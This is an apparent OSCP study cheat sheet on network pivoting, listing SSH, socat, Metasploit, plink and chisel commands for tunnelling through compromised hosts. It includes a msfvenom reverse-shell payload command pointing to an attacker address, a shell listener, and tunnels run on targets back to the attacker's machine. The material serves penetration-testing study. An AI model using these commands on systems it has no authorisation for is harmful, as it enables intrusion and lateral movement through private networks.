OSCP
Search…
Pivoting
1
Local port forwarding
2
Forward local port to remote host
3
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
4
5
Remote port forwarding
6
Forward remote port to local host
7
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
8
9
Dynamic port
10
ssh -D <local proxy port> -p <remote port> <target>
Copied!
SOCAT
1
socat file:`tty`,raw,echo=0 tcp-listen:8989
Copied!
PORT FORWARDING "port to port":
----MSF---- Most platforms
Forward: Get meterpreter session on one of the dual homed machines portfwd add -l 4445 -p 4443 -r ip Use -R to make it reverse
----SSH---- For Linux
~C "if you already have an SSH session"
-R 8081:ip:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
:8081<------------:80 Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:ip:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
:8084<------------:8083<------------:XXXX run nc on port 8084, and if ip:8083 receives a reverse shell, you will get it
For reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine: On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd" ssh - -R 12345:192.168.122.228:5986 [email protected]
---PLINK---- Just like SSH, on Windows service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe ip -P 22 -C -N -L 0.0.0.0:4445:ip:4443 -l KALIUSER -pw PASS
---SOCAT---- For linux
Forward your 8083 to ip:443 ./socat TCP4-LISTEN:8083,fork TCP4:ip:443
---CHISEL---- Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener": ./chisel server -p 8000 -reverse
General command: ./chisel client : L/R:[YOUR LOCAL IP]:::
Remote tunnels "access IP:PORT you couldn't access before": On Target: ./chisel client ip:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us": On Target: ./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
DYNAMIC "port to any": setup proxychains with socks5 on 127.0.0.1:1080 Or set up socks5 proxy on firefox For nmap use -Pn -sT or use tcp scanner in msf
----MSF---- Most platforms
Get meterpreter session on one of the dual homed machines Auto route to ip (multi/manage/autoroute) Start socks proxy (auxiliary/server/socks4a)
----SSH---- For Linux
-D1080
---PLINK--- Just like SSH, on Windows
On Target: plink.exe ip -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL---- Most platforms
On Kali: ./chisel server -p 8000 -reverse
On Target: ./chisel client ip:8000 R:8001:127.0.0.1:1080 ./chisel server -p 8001 --socks5
On Kali: ./chisel client 127.0.0.1:8001 socks
Last modified 1yr ago
Copy link